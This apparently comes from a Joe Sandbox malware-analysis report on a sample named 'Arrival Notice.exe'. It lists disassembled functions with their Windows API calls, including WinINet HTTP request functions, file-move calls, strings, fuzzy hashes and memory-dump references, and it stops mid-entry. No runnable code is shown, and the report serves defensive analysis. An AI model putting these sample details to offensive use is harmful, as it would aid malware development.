Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C

Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON

Download Yara Rule

Strings

NAME, xrefs: 004695D7
CLASS, xrefs: 004694F1
INSTANCE, xrefs: 004696DF
REGEXPCLASS, xrefs: 0046954B
CLASSNN, xrefs: 0046951E
TEXT, xrefs: 00469712

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 0-1603158881
Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A

Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00448603
SetMenu.USER32(?,00000000), ref: 00448613
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
IsMenu.USER32(?), ref: 004486AB
CreatePopupMenu.USER32 ref: 004486B5
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
DrawMenuBar.USER32 ref: 004486F5

Strings

0, xrefs: 004485E5

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0
API String ID: 161812096-4108050209
Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8

Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Arrival Notice.exe), ref: 00434057
LoadStringW.USER32(00000000), ref: 00434060
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
LoadStringW.USER32(00000000), ref: 00434078
_wprintf.LIBCMT ref: 004340A1
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0043409C
C:\Users\user\Desktop\Arrival Notice.exe, xrefs: 00434040

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Arrival Notice.exe
API String ID: 3648134473-1051846745
Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5

Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42cd84ef4a4b254aae9ec84ab079050a213711e960575adb49efc3be773cc30a
Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
Opcode Fuzzy Hash: 42cd84ef4a4b254aae9ec84ab079050a213711e960575adb49efc3be773cc30a
Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96

Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58

Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Arrival Notice.exe,0040F545,C:\Users\user\Desktop\Arrival Notice.exe,004A90E8,C:\Users\user\Desktop\Arrival Notice.exe,?,0040F545), ref: 0041013C

Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F

lstrcmpiW.KERNEL32(?,?), ref: 00453900
MoveFileW.KERNEL32(?,?), ref: 00453932

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: File$AttributesFullMoveNamePathlstrcmpi
String ID:
API String ID: 978794511-0
Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55

Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769

Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0043271C
VariantClear.OLEAUT32(?), ref: 00432722
VariantClear.OLEAUT32(?), ref: 00432728
VariantClear.OLEAUT32(?), ref: 00432731
VariantClear.OLEAUT32(?), ref: 0043273A
VariantClear.OLEAUT32(?), ref: 00432740
VariantClear.OLEAUT32(?), ref: 00432749
VariantClear.OLEAUT32(?), ref: 00432752
VariantClear.OLEAUT32(?), ref: 0043275B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64

Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0044F2D3
_memmove.LIBCMT ref: 0044F342
_memmove.LIBCMT ref: 0044F3B6

Strings

', xrefs: 0044F222
\, xrefs: 0044D061
h, xrefs: 0044F78E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove$_memcmp
String ID: '$\$h
API String ID: 2205784470-1303700344
Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54

Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0045EA56
VariantCopy.OLEAUT32(00000000), ref: 0045EA60
VariantClear.OLEAUT32 ref: 0045EA6D
VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
__swprintf.LIBCMT ref: 0045EC33
VariantInit.OLEAUT32(00000000), ref: 0045ECEE

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Variant$InitTime$ClearCopySystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d
API String ID: 2441338619-1568723262
Opcode ID: b8c3366479ac5ee96e7d694e1c6d037b27c933f553c4e95492a52c6e994464b6
Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
Opcode Fuzzy Hash: b8c3366479ac5ee96e7d694e1c6d037b27c933f553c4e95492a52c6e994464b6
Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5

Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
Sleep.KERNEL32(0000000A), ref: 0042C67F
InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C

Strings

@COM_EVENTOBJ, xrefs: 0042C771, 0042CA08

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$Sleep
String ID: @COM_EVENTOBJ
API String ID: 327565842-2228938565
Opcode ID: 94ddb53c34c71899e588454d000480c21482c8ac4a970d787de608e9b69dba0d
Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
Opcode Fuzzy Hash: 94ddb53c34c71899e588454d000480c21482c8ac4a970d787de608e9b69dba0d
Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98

Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0047031B
VariantClear.OLEAUT32(?), ref: 0047044F
VariantInit.OLEAUT32(?), ref: 004704A3
DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
VariantClear.OLEAUT32(?), ref: 00470516

Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492

VariantCopy.OLEAUT32(?,?), ref: 0047057A

Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414

VariantClear.OLEAUT32(00000000), ref: 0047060D

Strings

H, xrefs: 004702F6

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Variant$Clear$Copy$CallDispFuncInit
String ID: H
API String ID: 3613100350-2852464175
Opcode ID: bac023c95b3754fe6106274974d354ccc3a5a04b9930adb03413d9a67926b190
Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
Opcode Fuzzy Hash: bac023c95b3754fe6106274974d354ccc3a5a04b9930adb03413d9a67926b190
Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A

Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
DestroyWindow.USER32(?), ref: 00426F50
UnregisterHotKey.USER32(?), ref: 00426F77
FreeLibrary.KERNEL32(?), ref: 0042701F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050

Strings

close all, xrefs: 00401D01

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
String ID: close all
API String ID: 4174999648-3243417748
Opcode ID: d7ac3104d7ae6fac27feef706535c76765a07ff2df80d75d47316df83ad5e488
Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
Opcode Fuzzy Hash: d7ac3104d7ae6fac27feef706535c76765a07ff2df80d75d47316df83ad5e488
Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99

Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB

Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1

Strings

, xrefs: 0044ABB4

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
String ID:
API String ID: 1291720006-3916222277
Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8

Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
IsMenu.USER32(?), ref: 0045FC5F
CreatePopupMenu.USER32 ref: 0045FC97
GetMenuItemCount.USER32(?), ref: 0045FCFD
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26

Strings

2, xrefs: 0045FC7B
0, xrefs: 0045FBF4

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66

Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
VariantClear.OLEAUT32(?), ref: 00435320
SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
VariantClear.OLEAUT32(?), ref: 004353B3
SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6

Strings

crts, xrefs: 004352F7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
